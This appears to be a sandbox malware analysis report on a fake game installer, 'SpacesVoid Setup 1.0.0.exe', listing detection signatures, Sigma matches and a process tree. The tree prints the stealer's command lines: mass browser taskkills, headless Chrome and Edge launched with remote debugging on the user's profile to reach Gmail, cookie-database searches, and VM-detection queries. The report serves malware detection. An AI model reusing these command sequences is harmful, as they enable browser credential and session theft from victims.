Edit tour

Windows Analysis Report
SpacesVoid Setup 1.0.0.exe

Overview

General Information

Sample name:	SpacesVoid Setup 1.0.0.exe
Analysis ID:	1595360
MD5:	5acd28f815ac1f46f41e0e67db46b34d
SHA1:	3f217a1e35ba0b6bcbec5cf8d3e983171206d786
SHA256:	869b5cdb04e68978ef7d45f99599b970c47d9ace74a84b5d11f62b2a6762f40d
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Drops large PE files

Excessive usage of taskkill to terminate processes

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Enables security privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Browser Execution In Headless Mode

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Too many similar processes found

Uses 32bit PE files

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

SpacesVoid Setup 1.0.0.exe (PID: 6852 cmdline: "C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe" MD5: 5ACD28F815AC1F46F41E0E67DB46B34D)

cmd.exe (PID: 424 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv | "C:\Windows\system32\find.exe" "SpacesVoid.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4832 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)

find.exe (PID: 3728 cmdline: "C:\Windows\system32\find.exe" "SpacesVoid.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)

SpacesVoid.exe (PID: 4304 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" MD5: F5457AB7A9461A94C949AEF76BB8AAF1)

cmd.exe (PID: 5928 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 340 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

SpacesVoid.exe (PID: 5868 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1728 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: F5457AB7A9461A94C949AEF76BB8AAF1)

cmd.exe (PID: 7056 cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5712 cmdline: curl http://api.ipify.org/ --ssl-no-revoke MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 3380 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5376 cmdline: wmic bios get smbiosbiosversion MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

SpacesVoid.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2416 --field-trial-handle=1732,i,2577388129059311954,1337819537177688922,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: F5457AB7A9461A94C949AEF76BB8AAF1)

cmd.exe (PID: 6928 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5716 cmdline: wmic MemoryChip get /format:list MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

find.exe (PID: 364 cmdline: find /i "Speed" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)

cmd.exe (PID: 5244 cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 972 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5372 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6708 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3608 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1132 cmdline: taskkill /IM chrome.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5176 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2840 cmdline: taskkill /IM msedge.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6472 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM brave.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7108 cmdline: taskkill /IM brave.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3756 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM firefox.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5160 cmdline: taskkill /IM firefox.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM opera.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 988 cmdline: taskkill /IM opera.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5616 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM kometa.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5480 cmdline: taskkill /IM kometa.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7120 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM orbitum.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3520 cmdline: taskkill /IM orbitum.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6944 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM centbrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3664 cmdline: taskkill /IM centbrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4828 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM 7star.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1136 cmdline: taskkill /IM 7star.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 4568 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM sputnik.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6268 cmdline: taskkill /IM sputnik.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 1948 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM vivaldi.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5376 cmdline: taskkill /IM vivaldi.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 508 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM epicprivacybrowser.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3636 cmdline: taskkill /IM epicprivacybrowser.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5196 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM uran.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 3748 cmdline: taskkill /IM uran.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM yandex.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5244 cmdline: taskkill /IM yandex.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6992 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM iridium.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2056 cmdline: taskkill /IM iridium.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6128 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

where.exe (PID: 1776 cmdline: where /r . cookies.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)

cmd.exe (PID: 1976 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7188 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

chrome.exe (PID: 7272 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1680 --field-trial-handle=1496,i,17456217344094680572,15574627026169771405,262144 --disable-features=PaintHolding /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7664 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7720 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7768 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

msedge.exe (PID: 7796 cmdline: "C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 8008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1884 --field-trial-handle=1456,i,1191886184323445793,12446102649480836012,262144 --disable-features=PaintHolding /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5024 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 2064 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 1048 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 6336 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4916 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3576 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5576 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 2616 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . *.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

where.exe (PID: 4948 cmdline: where /r . *.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)

cmd.exe (PID: 2572 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7068 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3380 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM Steam.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5004 cmdline: taskkill /IM Steam.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3704 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM javaw.exe /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 2820 cmdline: taskkill /IM javaw.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 6788 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 5896 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 6048 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6076 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5536 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3432 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 5308 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 3928 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7264 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6492 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cleanup

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe, ParentProcessId: 4304, ParentProcessName: SpacesVoid.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite", ProcessId: 6128, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com, CommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com, CommandLine|base64offset|contains: +{Zz", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe, ParentProcessId: 4304, ParentProcessName: SpacesVoid.exe, ProcessCommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com, ProcessId: 7272, ProcessName: chrome.exe

Sigma detected: Browser Execution In Headless Mode

Source: Process started

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com, CommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com, CommandLine|base64offset|contains: +{Zz", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe, ParentProcessId: 4304, ParentProcessName: SpacesVoid.exe, ProcessCommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com, ProcessId: 7272, ProcessName: chrome.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe, ParentProcessId: 4304, ParentProcessName: SpacesVoid.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke", ProcessId: 7056, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, CommandLine: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5372, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName, ProcessId: 6708, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: SpacesVoid Setup 1.0.0.exe

